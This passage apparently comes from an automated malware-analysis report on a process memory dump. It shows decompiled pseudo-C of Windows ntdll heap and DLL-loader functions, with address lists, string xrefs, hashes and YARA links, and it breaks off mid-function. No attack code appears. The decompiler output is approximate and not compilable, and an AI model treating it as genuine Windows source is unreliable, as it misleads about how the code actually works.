							E00FBA80D(_t236, _t256, _t210, 0);
							_t141 = _v40;
						}
					}
					 *(_t256 + 2) =  *(_t256 + 2) & 0x000000f0;
					 *((char*)(_t256 + 6)) = _t141;
					_t142 = _v12;
					 *_t256 = _t142;
					 *(_t256 + 3) = 0;
					_t211 = _t142 & 0x0000ffff;
					 *((char*)(_t256 + 7)) = 0;
					_v20 = _t211;
					if(( *(_t206 + 0x40) & 0x00000040) != 0) {
						_t119 = _t256 + 0x10; // -8
						E00F4D5E0(_t119, _t211 * 8 - 0x10, 0xfeeefeee);
						 *(_t256 + 2) =  *(_t256 + 2) | 0x00000004;
						_t211 = _v20;
					}
					_t252 =  *((intOrPtr*)(_t206 + 0xb4));
					if(_t252 == 0) {
						L56:
						_t212 =  *((intOrPtr*)(_t206 + 0xc0));
						_t146 = _t206 + 0xc0;
						goto L19;
					} else {
						if(_t211 <  *((intOrPtr*)(_t252 + 4))) {
							L15:
							_t185 = _t211;
							goto L17;
						} else {
							while(1) {
								_t187 =  *_t252;
								if(_t187 == 0) {
									_t185 =  *((intOrPtr*)(_t252 + 4)) - 1;
									__eflags =  *((intOrPtr*)(_t252 + 4)) - 1;
									goto L17;
								}
								_t252 = _t187;
								if(_t211 >=  *((intOrPtr*)(_t252 + 4))) {
									continue;
								}
								goto L15;
							}
							while(1) {
								L17:
								_t212 = E00F1AB40(_t206, _t252, 1, _t185, _t211);
								if(_t212 != 0) {
									_t146 = _t206 + 0xc0;
									break;
								}
								_t252 =  *_t252;
								_t211 = _v20;
								_t185 =  *(_t252 + 0x14);
							}
							L19:
							if(_t146 != _t212) {
								_t237 =  *(_t206 + 0x4c);
								_t253 = _v20;
								while(1) {
									__eflags = _t237;
									if(_t237 == 0) {
										_t147 =  *(_t212 - 8) & 0x0000ffff;
									} else {
										_t184 =  *(_t212 - 8);
										_t237 =  *(_t206 + 0x4c);
										__eflags = _t184 & _t237;
										if((_t184 & _t237) != 0) {
											_t184 = _t184 ^  *(_t206 + 0x50);
											__eflags = _t184;
										}
										_t147 = _t184 & 0x0000ffff;
									}
									__eflags = _t253 - (_t147 & 0x0000ffff);
									if(_t253 <= (_t147 & 0x0000ffff)) {
										goto L20;
									}
									_t212 =  *_t212;
									__eflags = _t206 + 0xc0 - _t212;
									if(_t206 + 0xc0 != _t212) {
										continue;
									} else {
										goto L20;
									}
									goto L56;
								}
							}
							L20:
							_t149 =  *((intOrPtr*)(_t212 + 4));
							_t33 = _t256 + 8; // -16
							_t238 = _t33;
							_t254 =  *_t149;
							if( *_t149 != _t212) {
								_push(_t212);
								E00FBA80D(0, _t212, 0, _t254);
							} else {
								 *_t238 = _t212;
								 *((intOrPtr*)(_t238 + 4)) = _t149;
								 *_t149 = _t238;
								 *((intOrPtr*)(_t212 + 4)) = _t238;
							}
							 *((intOrPtr*)(_t206 + 0x74)) =  *((intOrPtr*)(_t206 + 0x74)) + ( *_t256 & 0x0000ffff);
							_t255 =  *((intOrPtr*)(_t206 + 0xb4));
							if(_t255 == 0) {
								L36:
								if( *(_t206 + 0x4c) != 0) {
									 *(_t256 + 3) =  *(_t256 + 1) ^  *(_t256 + 2) ^  *_t256;
									 *_t256 =  *_t256 ^  *(_t206 + 0x50);
								}
								_t210 = _v48;
								_t251 = _v12 & 0x0000ffff;
								_t131 = _v20;
								_t235 = _v24 - _t131;
								_v24 = _t235;
								_t256 = _t256 + _t131 * 8;
								if(_t256 >=  *((intOrPtr*)(_t210 + 0x28))) {
									goto L41;
								} else {
									goto L39;
								}
							} else {
								_t216 =  *_t256 & 0x0000ffff;
								_v28 = _t216;
								if(_t216 <  *((intOrPtr*)(_t255 + 4))) {
									L28:
									_t242 = _t216 -  *((intOrPtr*)(_t255 + 0x14));
									_v32 = _t242;
									if( *((intOrPtr*)(_t255 + 8)) != 0) {
										_t167 = _t242 + _t242;
									} else {
										_t167 = _t242;
									}
									 *((intOrPtr*)(_t255 + 0xc)) =  *((intOrPtr*)(_t255 + 0xc)) + 1;
									_t168 = _t167 << 2;
									_v40 = _t168;
									_t206 = _v44;
									_v16 =  *((intOrPtr*)(_t168 +  *((intOrPtr*)(_t255 + 0x20))));
									if(_t216 ==  *((intOrPtr*)(_t255 + 4)) - 1) {
										 *((intOrPtr*)(_t255 + 0x10)) =  *((intOrPtr*)(_t255 + 0x10)) + 1;
									}
									_t217 = _v16;
									if(_t217 != 0) {
										_t173 = _t217 - 8;
										_v52 = _t173;
										_t174 =  *_t173;
										__eflags =  *(_t206 + 0x4c);
										if( *(_t206 + 0x4c) != 0) {
											_t245 =  *(_t206 + 0x50) ^ _t174;
											_v36 = _t245;
											_t225 = _t245 >> 0x00000010 ^ _t245 >> 0x00000008 ^ _t245;
											__eflags = _t245 >> 0x18 - _t225;
											if(_t245 >> 0x18 != _t225) {
												_push(_t225);
												E00FBA80D(_t206, _v52, 0, 0);
											}
											_t174 = _v36;
											_t217 = _v16;
											_t242 = _v32;
										}
										_v28 = _v28 - (_t174 & 0x0000ffff);
										__eflags = _v28;
										if(_v28 > 0) {
											goto L34;
										} else {
											goto L33;
										}
									} else {
										L33:
										_t58 = _t256 + 8; // -16
										 *((intOrPtr*)(_v40 +  *((intOrPtr*)(_t255 + 0x20)))) = _t58;
										_t206 = _v44;
										_t217 = _v16;
										L34:
										if(_t217 == 0) {
											asm("bts eax, edx");
										}
										goto L36;
									}
								} else {
									goto L24;
								}
								while(1) {
									L24:
									_t182 =  *_t255;
									if(_t182 == 0) {
										_t216 =  *((intOrPtr*)(_t255 + 4)) - 1;
										__eflags = _t216;
										goto L28;
									}
									_t255 = _t182;
									if(_t216 >=  *((intOrPtr*)(_t255 + 4))) {
										continue;
									} else {
										goto L28;
									}
								}
								goto L28;
							}
						}
					}
					L39:
				} while (_t235 != 0);
				_t214 = _v12;
				_t131 =  *(_t206 + 0x54) ^ _t214;
				 *(_t256 + 4) = _t131;
				if(_t214 == 0) {
					__eflags =  *0xfe8748 - 1;
					if( *0xfe8748 >= 1) {
						_t127 = _t256 + 0xfff; // 0xfff
						_t131 = _t127 & 0xfffff000;
						__eflags = _t131 - _t256;
						if(_t131 != _t256) {
							_t156 =  *[fs:0x30];
							__eflags =  *(_t156 + 0xc);
							if( *(_t156 + 0xc) == 0) {
								_push("HEAP: ");
								E00EFB150();
							} else {
								E00EFB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
							}
							_push("ROUND_UP_TO_POWER2(FreeBlock, PAGE_SIZE) == (ULONG_PTR)FreeBlock");
							_t131 = E00EFB150();
							__eflags =  *0xfe7bc8;
							if(__eflags == 0) {
								_t131 = E00FB2073(_t206, 1, _t251, __eflags);
							}
						}
					}
				}
				goto L41;
			}

0x00f1a83a
0x00f1a83c
0x00f1a83e
0x00f1a841
0x00f1a844
0x00f1a84a
0x00f1aa53
0x00f1aa59
0x00f1aa59
0x00f1a858
0x00f1a85e
0x00f1aaf5
0x00f1aafc
0x00f6229e
0x00f622a2
0x00f622a8
0x00f622b3
0x00f622b5
0x00f622bb
0x00f622c1
0x00f622c5
0x00f622e6
0x00f622eb
0x00f622f0
0x00f622c7
0x00f622dc
0x00f622e1
0x00f622e1
0x00f622f3
0x00f622f8
0x00f622fd
0x00f62300
0x00f62307
0x00f6230e
0x00f6230e
0x00f62313
0x00f62313
0x00f622b5
0x00f622a2
0x00f1aafc
0x00f1a864
0x00f1a869
0x00f1aa5c
0x00f1aa5e
0x00f1a86f
0x00f1a87f
0x00f1a885
0x00f1a885
0x00f1a88b
0x00f1a890
0x00f1a896
0x00f1ab0c
0x00f1ab0f
0x00f1ab15
0x00f62320
0x00f62320
0x00f1ab1b
0x00f1a89c
0x00f1a89f
0x00f1a8a2
0x00f1a8a2
0x00f1a8a5
0x00f1a8af
0x00f1a8b3
0x00f1a8b8
0x00f1aa66
0x00f1a8be
0x00f1a8c5
0x00f1a8c6
0x00f1a8ce
0x00f62328
0x00f62332
0x00f62337
0x00f62337
0x00f1a8ce
0x00f1a8d4
0x00f1a8d8
0x00f1a8db
0x00f1a8de
0x00f1a8e1
0x00f1a8e5
0x00f1a8e8
0x00f1a8f0
0x00f1a8f3
0x00f6234c
0x00f62350
0x00f62355
0x00f62359
0x00f62359
0x00f1a8f9
0x00f1a901
0x00f1aae4
0x00f1aae4
0x00f1aaea
0x00000000
0x00f1a907
0x00f1a90a
0x00f1a91d
0x00f1a91d
0x00000000
0x00f1a910
0x00f1a910
0x00f1a910
0x00f1a914
0x00f1a924
0x00f1a924
0x00f1a924
0x00f1a924
0x00f1a916
0x00f1a91b
0x00000000
0x00000000
0x00000000
0x00f1a91b
0x00f1a925
0x00f1a925
0x00f1a932
0x00f1a936
0x00f1a93c
0x00f1a93c
0x00f1a93c
0x00f1ab22
0x00f1ab24
0x00f1ab27
0x00f1ab27
0x00f1a942
0x00f1a944
0x00f1aaba
0x00f1aabd
0x00f1aac0
0x00f1aac0
0x00f1aac2
0x00f1ab2f
0x00f1aac4
0x00f1aac4
0x00f1aac7
0x00f1aaca
0x00f1aacc
0x00f1aace
0x00f1aace
0x00f1aace
0x00f1aad1
0x00f1aad1
0x00f1aad7
0x00f1aad9
0x00000000
0x00000000
0x00f62361
0x00f62369
0x00f6236b
0x00000000
0x00f62371
0x00000000
0x00f62371
0x00000000
0x00f6236b
0x00f1aac0
0x00f1a94a
0x00f1a94a
0x00f1a94d
0x00f1a94d
0x00f1a950
0x00f1a954
0x00f62376
0x00f62380
0x00f1a95a
0x00f1a95a
0x00f1a95c
0x00f1a95f
0x00f1a961
0x00f1a961
0x00f1a967
0x00f1a96a
0x00f1a972
0x00f1aa02
0x00f1aa06
0x00f1aa10
0x00f1aa16
0x00f1aa16
0x00f1aa1b
0x00f1aa21
0x00f1aa24
0x00f1aa27
0x00f1aa29
0x00f1aa2c
0x00f1aa32
0x00000000
0x00000000
0x00000000
0x00000000
0x00f1a978
0x00f1a978
0x00f1a97b
0x00f1a981
0x00f1a996
0x00f1a998
0x00f1a99f
0x00f1a9a2
0x00f6238a
0x00f1a9a8
0x00f1a9a8
0x00f1a9a8
0x00f1a9aa
0x00f1a9ad
0x00f1a9b0
0x00f1a9bb
0x00f1a9be
0x00f1a9c7
0x00f1a9c9
0x00f1a9c9
0x00f1a9cc
0x00f1a9d1
0x00f1aa6d
0x00f1aa70
0x00f1aa73
0x00f1aa75
0x00f1aa79
0x00f1aa7e
0x00f1aa82
0x00f1aa8f
0x00f1aa94
0x00f1aa96
0x00f62392
0x00f623a1
0x00f623a1
0x00f1aa9c
0x00f1aa9f
0x00f1aaa2
0x00f1aaa2
0x00f1aaa8
0x00f1aaab
0x00f1aaaf
0x00000000
0x00f1aab5
0x00000000
0x00f1aab5
0x00f1a9d7
0x00f1a9d7
0x00f1a9da
0x00f1a9e0
0x00f1a9e3
0x00f1a9e6
0x00f1a9e9
0x00f1a9eb
0x00f1a9fd
0x00f1a9fd
0x00000000
0x00f1a9eb
0x00000000
0x00000000
0x00000000
0x00f1a983
0x00f1a983
0x00f1a983
0x00f1a987
0x00f1a995
0x00f1a995
0x00f1a995
0x00f1a995
0x00f1a989
0x00f1a98e
0x00000000
0x00f1a990
0x00000000
0x00f1a990
0x00f1a98e
0x00000000
0x00f1a983
0x00f1a972
0x00f1a90a
0x00f1aa34
0x00f1aa34
0x00f1aa40
0x00f1aa43
0x00f1aa46
0x00f1aa4d
0x00f623ab
0x00f623b2
0x00f623b8
0x00f623be
0x00f623c3
0x00f623c5
0x00f623cb
0x00f623d1
0x00f623d5
0x00f623f6
0x00f623fb
0x00f623d7
0x00f623ec
0x00f623f1
0x00f62403
0x00f62408
0x00f62410
0x00f62417
0x00f62422
0x00f62422
0x00f62417
0x00f623c5
0x00f623b2
0x00000000

Strings

HEAP[%wZ]: , xrefs: 00F622D7, 00F623E7
((FreeBlock->Flags & HEAP_ENTRY_DECOMMITTED) || (ROUND_UP_TO_POWER2(FreeBlock, PAGE_SIZE) == (ULONG_PTR)FreeBlock)), xrefs: 00F622F3
HEAP: , xrefs: 00F622E6, 00F623F6
ROUND_UP_TO_POWER2(FreeBlock, PAGE_SIZE) == (ULONG_PTR)FreeBlock, xrefs: 00F62403

Memory Dump Source

Source File: 00000002.00000002.266831391.0000000000ED0000.00000040.00000001.sdmp, Offset: 00ED0000, based on PE: true

Similarity

API ID:
String ID: ((FreeBlock->Flags & HEAP_ENTRY_DECOMMITTED) || (ROUND_UP_TO_POWER2(FreeBlock, PAGE_SIZE) == (ULONG_PTR)FreeBlock))$HEAP: $HEAP[%wZ]: $ROUND_UP_TO_POWER2(FreeBlock, PAGE_SIZE) == (ULONG_PTR)FreeBlock
API String ID: 0-1657114761
Opcode ID: 25777d90e60e68bf0816cbef88391fbf3df2dcc10ee771d9020975bfb00c9bbe
Instruction ID: a918251112a48d491c265ea52c58e61371fc5e7066637c3cd0fd77a12554c349
Opcode Fuzzy Hash: 25777d90e60e68bf0816cbef88391fbf3df2dcc10ee771d9020975bfb00c9bbe
Instruction Fuzzy Hash: 70D1D130A01645CFDB18CF68C590BBAB7F1FF48310F158169E85A9B742E334AD85EB52

Uniqueness

Uniqueness Score: -1.00%

Function 00F1A229, Relevance: 5.2, Strings: 4, Instructions: 183
COMMON

Download Yara Rule

C-Code - Quality: 69%

			E00F1A229(void* __ecx, void* __edx) {
				signed int _v20;
				char _v24;
				char _v28;
				void* _v44;
				void* _v48;
				void* _v56;
				void* _v60;
				void* __ebx;
				signed int _t55;
				signed int _t57;
				void* _t61;
				intOrPtr _t62;
				void* _t65;
				void* _t71;
				signed char* _t74;
				intOrPtr _t75;
				signed char* _t80;
				intOrPtr _t81;
				void* _t82;
				signed char* _t85;
				signed char _t91;
				void* _t103;
				void* _t105;
				void* _t121;
				void* _t129;
				signed int _t131;
				void* _t133;

				_t105 = __ecx;
				_t133 = (_t131 & 0xfffffff8) - 0x1c;
				_t103 = __edx;
				_t129 = __ecx;
				E00F1DF24(__edx,  &_v28, _t133);
				_t55 =  *(_t129 + 0x40) & 0x00040000;
				asm("sbb edi, edi");
				_t121 = ( ~_t55 & 0x0000003c) + 4;
				if(_t55 != 0) {
					_push(0);
					_push(0x14);
					_push( &_v24);
					_push(3);
					_push(_t129);
					_push(0xffffffff);
					_t57 = E00F39730();
					__eflags = _t57;
					if(_t57 < 0) {
						L17:
						_push(_t105);
						E00FBA80D(_t129, 1, _v20, 0);
						_t121 = 4;
						goto L1;
					}
					__eflags = _v20 & 0x00000060;
					if((_v20 & 0x00000060) == 0) {
						goto L17;
					}
					__eflags = _v24 - _t129;
					if(_v24 == _t129) {
						goto L1;
					}
					goto L17;
				}
				L1:
				_push(_t121);
				_push(0x1000);
				_push(_t133 + 0x14);
				_push(0);
				_push(_t133 + 0x20);
				_push(0xffffffff);
				_t61 = E00F39660();
				_t122 = _t61;
				if(_t61 < 0) {
					_t62 =  *[fs:0x30];
					 *((intOrPtr*)(_t129 + 0x218)) =  *((intOrPtr*)(_t129 + 0x218)) + 1;
					__eflags =  *(_t62 + 0xc);
					if( *(_t62 + 0xc) == 0) {
						_push("HEAP: ");
						E00EFB150();
					} else {
						E00EFB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
					}
					_push( *((intOrPtr*)(_t133 + 0xc)));
					_push( *((intOrPtr*)(_t133 + 0x14)));
					_push(_t129);
					E00EFB150("ZwAllocateVirtualMemory failed %lx for heap %p (base %p, size %Ix)\n", _t122);
					_t65 = 0;
					L13:
					return _t65;
				}
				_t71 = E00F17D50();
				_t124 = 0x7ffe0380;
				if(_t71 != 0) {
					_t74 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
				} else {
					_t74 = 0x7ffe0380;
				}
				if( *_t74 != 0) {
					_t75 =  *[fs:0x30];
					__eflags =  *(_t75 + 0x240) & 0x00000001;
					if(( *(_t75 + 0x240) & 0x00000001) != 0) {
						E00FB138A(_t103, _t129,  *((intOrPtr*)(_t133 + 0x10)),  *((intOrPtr*)(_t133 + 0x10)), 8);
					}
				}
				 *((intOrPtr*)(_t129 + 0x230)) =  *((intOrPtr*)(_t129 + 0x230)) - 1;
				 *((intOrPtr*)(_t129 + 0x234)) =  *((intOrPtr*)(_t129 + 0x234)) -  *((intOrPtr*)(_t133 + 0xc));
				if(E00F17D50() != 0) {
					_t80 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
				} else {
					_t80 = _t124;
				}
				if( *_t80 != 0) {
					_t81 =  *[fs:0x30];
					__eflags =  *(_t81 + 0x240) & 0x00000001;
					if(( *(_t81 + 0x240) & 0x00000001) != 0) {
						__eflags = E00F17D50();
						if(__eflags != 0) {
							_t124 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
							__eflags =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
						}
						E00FB1582(_t103, _t129,  *((intOrPtr*)(_t133 + 0x10)), __eflags,  *((intOrPtr*)(_t133 + 0x14)),  *(_t129 + 0x74) << 3,  *_t124 & 0x000000ff);
					}
				}
				_t82 = E00F17D50();
				_t125 = 0x7ffe038a;
				if(_t82 != 0) {
					_t85 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x230;
				} else {
					_t85 = 0x7ffe038a;
				}
				if( *_t85 != 0) {
					__eflags = E00F17D50();
					if(__eflags != 0) {
						_t125 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x230;
						__eflags =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x230;
					}
					E00FB1582(_t103, _t129,  *((intOrPtr*)(_t133 + 0x10)), __eflags,  *((intOrPtr*)(_t133 + 0x14)),  *(_t129 + 0x74) << 3,  *_t125 & 0x000000ff);
				}
				 *((intOrPtr*)(_t129 + 0x20c)) =  *((intOrPtr*)(_t129 + 0x20c)) + 1;
				_t91 =  *(_t103 + 2);
				if((_t91 & 0x00000004) != 0) {
					E00F4D5E0( *((intOrPtr*)(_t133 + 0x18)),  *((intOrPtr*)(_t133 + 0x10)), 0xfeeefeee);
					_t91 =  *(_t103 + 2);
				}
				 *(_t103 + 2) = _t91 & 0x00000017;
				_t65 = 1;
				goto L13;
			}

0x00f1a229
0x00f1a231
0x00f1a23f
0x00f1a242
0x00f1a244
0x00f1a24c
0x00f1a255
0x00f1a25a
0x00f1a25f
0x00f61c76
0x00f61c78
0x00f61c7e
0x00f61c7f
0x00f61c81
0x00f61c82
0x00f61c84
0x00f61c89
0x00f61c8b
0x00f61c9e
0x00f61c9e
0x00f61cab
0x00f61cb2
0x00000000
0x00f61cb2
0x00f61c8d
0x00f61c92
0x00000000
0x00000000
0x00f61c94
0x00f61c98
0x00000000
0x00000000
0x00000000
0x00f61c98
0x00f1a265
0x00f1a265
0x00f1a266
0x00f1a26f
0x00f1a270
0x00f1a276
0x00f1a277
0x00f1a279
0x00f1a27e
0x00f1a282
0x00f61db5
0x00f61dbb
0x00f61dc1
0x00f61dc5
0x00f61de4
0x00f61de9
0x00f61dc7
0x00f61ddc
0x00f61de1
0x00f61def
0x00f61df3
0x00f61df7
0x00f61dfe
0x00f61e06
0x00f1a302
0x00f1a308
0x00f1a308
0x00f1a288
0x00f1a28d
0x00f1a294
0x00f61cc1
0x00f1a29a
0x00f1a29a
0x00f1a29a
0x00f1a29f
0x00f61ccb
0x00f61cd1
0x00f61cd8
0x00f61cea
0x00f61cea
0x00f61cd8
0x00f1a2a9
0x00f1a2af
0x00f1a2bc
0x00f61cfd
0x00f1a2c2
0x00f1a2c2
0x00f1a2c2
0x00f1a2c7
0x00f61d07
0x00f61d0d
0x00f61d14
0x00f61d1f
0x00f61d21
0x00f61d2c
0x00f61d2c
0x00f61d2c
0x00f61d47
0x00f61d47
0x00f61d14
0x00f1a2cd
0x00f1a2d2
0x00f1a2d9
0x00f61d5a
0x00f1a2df
0x00f1a2df
0x00f1a2df
0x00f1a2e4
0x00f61d69
0x00f61d6b
0x00f61d76
0x00f61d76
0x00f61d76
0x00f61d91
0x00f61d91
0x00f1a2ea
0x00f1a2f0
0x00f1a2f5
0x00f61da8
0x00f61dad
0x00f61dad
0x00f1a2fd
0x00f1a300
0x00000000

Strings

HEAP[%wZ]: , xrefs: 00F61DD7
`, xrefs: 00F61C8D
ZwAllocateVirtualMemory failed %lx for heap %p (base %p, size %Ix), xrefs: 00F61DF9
HEAP: , xrefs: 00F61DE4

Memory Dump Source

Source File: 00000002.00000002.266831391.0000000000ED0000.00000040.00000001.sdmp, Offset: 00ED0000, based on PE: true

Similarity

API ID: InitializeThunk
String ID: HEAP: $HEAP[%wZ]: $ZwAllocateVirtualMemory failed %lx for heap %p (base %p, size %Ix)$`
API String ID: 2994545307-2586055223
Opcode ID: 03d11ca38963085a5ad49a5666a046093aef240874059a312c27f7753394053a
Instruction ID: 79ff8db1852bb2f0c396b1885eebb0eafd3b9385929187421d9f91c3ae8e2fcf
Opcode Fuzzy Hash: 03d11ca38963085a5ad49a5666a046093aef240874059a312c27f7753394053a
Instruction Fuzzy Hash: EE51F0326057809FD322DB68CC45FAB77E8FF80B60F180468F9558B292D779D840EB62

Uniqueness

Uniqueness Score: -1.00%

Function 00F28E00, Relevance: 5.1, Strings: 4, Instructions: 126
COMMON

Download Yara Rule

C-Code - Quality: 44%

			E00F28E00(void* __ecx) {
				signed int _v8;
				char _v12;
				void* __ebx;
				void* __edi;
				void* __esi;
				intOrPtr* _t32;
				intOrPtr _t35;
				intOrPtr _t43;
				void* _t46;
				intOrPtr _t47;
				void* _t48;
				signed int _t49;
				void* _t50;
				intOrPtr* _t51;
				signed int _t52;
				void* _t53;
				intOrPtr _t55;

				_v8 =  *0xfed360 ^ _t52;
				_t49 = 0;
				_t48 = __ecx;
				_t55 =  *0xfe8464; // 0x74b10110
				if(_t55 == 0) {
					L9:
					if( !_t49 >= 0) {
						if(( *0xfe5780 & 0x00000003) != 0) {
							E00F75510("minkernel\\ntdll\\ldrsnap.c", 0x2b5, "LdrpFindDllActivationContext", 0, "Querying the active activation context failed with status 0x%08lx\n", _t49);
						}
						if(( *0xfe5780 & 0x00000010) != 0) {
							asm("int3");
						}
					}
					return E00F3B640(_t49, 0, _v8 ^ _t52, _t47, _t48, _t49);
				}
				_t47 =  *((intOrPtr*)(__ecx + 0x18));
				_t43 =  *0xfe7984; // 0x9d2ae0
				if( *((intOrPtr*)( *[fs:0x30] + 0x1f8)) == 0 || __ecx != _t43) {
					_t32 =  *((intOrPtr*)(_t48 + 0x28));
					if(_t48 == _t43) {
						_t50 = 0x5c;
						if( *_t32 == _t50) {
							_t46 = 0x3f;
							if( *((intOrPtr*)(_t32 + 2)) == _t46 &&  *((intOrPtr*)(_t32 + 4)) == _t46 &&  *((intOrPtr*)(_t32 + 6)) == _t50 &&  *((intOrPtr*)(_t32 + 8)) != 0 &&  *((short*)(_t32 + 0xa)) == 0x3a &&  *((intOrPtr*)(_t32 + 0xc)) == _t50) {
								_t32 = _t32 + 8;
							}
						}
					}
					_t51 =  *0xfe8464; // 0x74b10110
					 *0xfeb1e0(_t47, _t32,  &_v12);
					_t49 =  *_t51();
					if(_t49 >= 0) {
						L8:
						_t35 = _v12;
						if(_t35 != 0) {
							if( *((intOrPtr*)(_t48 + 0x48)) != 0) {
								E00F29B10( *((intOrPtr*)(_t48 + 0x48)));
								_t35 = _v12;
							}
							 *((intOrPtr*)(_t48 + 0x48)) = _t35;
						}
						goto L9;
					}
					if(_t49 != 0xc000008a) {
						if(_t49 != 0xc000008b && _t49 != 0xc0000089 && _t49 != 0xc000000f && _t49 != 0xc0000204 && _t49 != 0xc0000002) {
							if(_t49 != 0xc00000bb) {
								goto L8;
							}
						}
					}
					if(( *0xfe5780 & 0x00000005) != 0) {
						_push(_t49);
						E00F75510("minkernel\\ntdll\\ldrsnap.c", 0x298, "LdrpFindDllActivationContext", 2, "Probing for the manifest of DLL \"%wZ\" failed with status 0x%08lx\n", _t48 + 0x24);
						_t53 = _t53 + 0x1c;
					}
					_t49 = 0;
					goto L8;
				} else {
					goto L9;
				}
			}

0x00f28e0f
0x00f28e16
0x00f28e19
0x00f28e1b
0x00f28e21
0x00f28e7f
0x00f28e85
0x00f69354
0x00f6936c
0x00f69371
0x00f6937b
0x00f69381
0x00f69381
0x00f6937b
0x00f28e9d
0x00f28e9d
0x00f28e29
0x00f28e2c
0x00f28e38
0x00f28e3e
0x00f28e43
0x00f28eb5
0x00f28eb9
0x00f692aa
0x00f692af
0x00f692e8
0x00f692e8
0x00f692af
0x00f28eb9
0x00f28e45
0x00f28e53
0x00f28e5b
0x00f28e5f
0x00f28e78
0x00f28e78
0x00f28e7d
0x00f28ec3
0x00f28ecd
0x00f28ed2
0x00f28ed2
0x00f28ec5
0x00f28ec5
0x00000000
0x00f28e7d
0x00f28e67
0x00f28ea4
0x00f6931a
0x00000000
0x00000000
0x00f69320
0x00f28ea4
0x00f28e70
0x00f69325
0x00f69340
0x00f69345
0x00f69345
0x00f28e76
0x00000000
0x00000000
0x00000000
0x00000000

Strings

LdrpFindDllActivationContext, xrefs: 00F69331, 00F6935D
Querying the active activation context failed with status 0x%08lx, xrefs: 00F69357
Probing for the manifest of DLL "%wZ" failed with status 0x%08lx, xrefs: 00F6932A
minkernel\ntdll\ldrsnap.c, xrefs: 00F6933B, 00F69367

Memory Dump Source

Source File: 00000002.00000002.266831391.0000000000ED0000.00000040.00000001.sdmp, Offset: 00ED0000, based on PE: true

Similarity

API ID:
String ID: LdrpFindDllActivationContext$Probing for the manifest of DLL "%wZ" failed with status 0x%08lx$Querying the active activation context failed with status 0x%08lx$minkernel\ntdll\ldrsnap.c
API String ID: 0-3779518884
Opcode ID: a75de0f76928de010678438a547f9f1491db63302c6b0444a8dac134e56347c6
Instruction ID: 589db76c552490c27fe32e3fb94cc3bd1f8d686ba1b57d9ee2682b1a4865287a
Opcode Fuzzy Hash: a75de0f76928de010678438a547f9f1491db63302c6b0444a8dac134e56347c6
Instruction Fuzzy Hash: B7411C32E02B759FDB34AB94EC89B357674EB107E8F07416AE4045B191EFB05D82B382

Uniqueness

Uniqueness Score: -1.00%

Function 00FB49A4, Relevance: 5.1, Strings: 4, Instructions: 114COMMON

Download Yara Rule

Strings

This is located in the %s field of the heap header., xrefs: 00FB4AD6
HEAP[%wZ]: , xrefs: 00FB4A3D, 00FB4AB7
Heap %p - headers modified (%p is %lx instead of %lx), xrefs: 00FB4A61
HEAP: , xrefs: 00FB4A4A, 00FB4A5D, 00FB4A5F, 00FB4AC4

Memory Dump Source

Source File: 00000002.00000002.266831391.0000000000ED0000.00000040.00000001.sdmp, Offset: 00ED0000, based on PE: true

Similarity

API ID: InitializeThunk
String ID: This is located in the %s field of the heap header.$HEAP: $HEAP[%wZ]: $Heap %p - headers modified (%p is %lx instead of %lx)
API String ID: 2994545307-336120773
Opcode ID: dc870fc6fc7486194672bea82cb237826693922858dcd0c15b973184d08f0229
Instruction ID: 196ca7456a97eb6451125d6f941ab4e1947ccda9c6aac731392b30884c7c4515
Opcode Fuzzy Hash: dc870fc6fc7486194672bea82cb237826693922858dcd0c15b973184d08f0229
Instruction Fuzzy Hash: F631D332681214EFD710DF9AC986FA7B3ECEB04720F244156F505AB293D778B840EA59

Uniqueness

Uniqueness Score: -1.00%

Function 00F199BF, Relevance: 4.3, Strings: 3, Instructions: 572
COMMONCrypto

Download Yara Rule

C-Code - Quality: 78%

			E00F199BF(signed int __ecx, signed short* __edx, signed int* _a4, signed int _a8) {
				char _v5;
				signed int _v12;
				signed int _v16;
				signed short _v20;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed short _t186;
				intOrPtr _t187;
				signed short _t190;
				signed int _t196;
				signed short _t197;
				intOrPtr _t203;
				signed int _t207;
				signed int _t210;
				signed short _t215;
				intOrPtr _t216;
				signed short _t219;
				signed int _t221;
				signed short _t222;
				intOrPtr _t228;
				signed int _t232;
				signed int _t235;
				signed int _t250;
				signed short _t251;
				intOrPtr _t252;
				signed short _t254;
				intOrPtr _t255;
				signed int _t258;
				signed int _t259;
				signed short _t262;
				intOrPtr _t271;
				signed int _t279;
				signed int _t282;
				signed int _t284;
				signed int _t286;
				intOrPtr _t292;
				signed int _t296;
				signed int _t299;
				signed int _t307;
				signed int* _t309;
				signed short* _t311;
				signed short* _t313;
				signed char _t314;
				intOrPtr _t316;
				signed int _t323;
				signed char _t328;
				signed short* _t330;
				signed char _t331;
				intOrPtr _t335;
				signed int _t342;
				signed char _t347;
				signed short* _t348;
				signed short* _t350;
				signed short _t352;
				signed char _t354;
				intOrPtr _t357;
				intOrPtr* _t364;
				signed char _t365;
				intOrPtr _t366;
				signed int _t373;
				signed char _t378;
				signed int* _t381;
				signed int _t382;
				signed short _t384;
				signed int _t386;
				unsigned int _t390;
				signed int _t393;
				signed int* _t394;
				unsigned int _t398;
				signed short _t400;
				signed short _t402;
				signed int _t404;
				signed int _t407;
				unsigned int _t411;
				signed short* _t414;
				signed int _t415;
				signed short* _t419;
				signed int* _t420;
				void* _t421;

				_t414 = __edx;
				_t307 = __ecx;
				_t419 = __edx - (( *(__edx + 4) & 0x0000ffff ^  *(__ecx + 0x54) & 0x0000ffff) << 3);
				if(_t419 == __edx || (( *(__ecx + 0x4c) >> 0x00000014 &  *(__ecx + 0x52) ^ _t419[1]) & 0x00000001) != 0) {
					_v5 = _a8;
					L3:
					_t381 = _a4;
					goto L4;
				} else {
					__eflags =  *(__ecx + 0x4c);
					if( *(__ecx + 0x4c) != 0) {
						_t411 =  *(__ecx + 0x50) ^  *_t419;
						 *_t419 = _t411;
						_t378 = _t411 >> 0x00000010 ^ _t411 >> 0x00000008 ^ _t411;
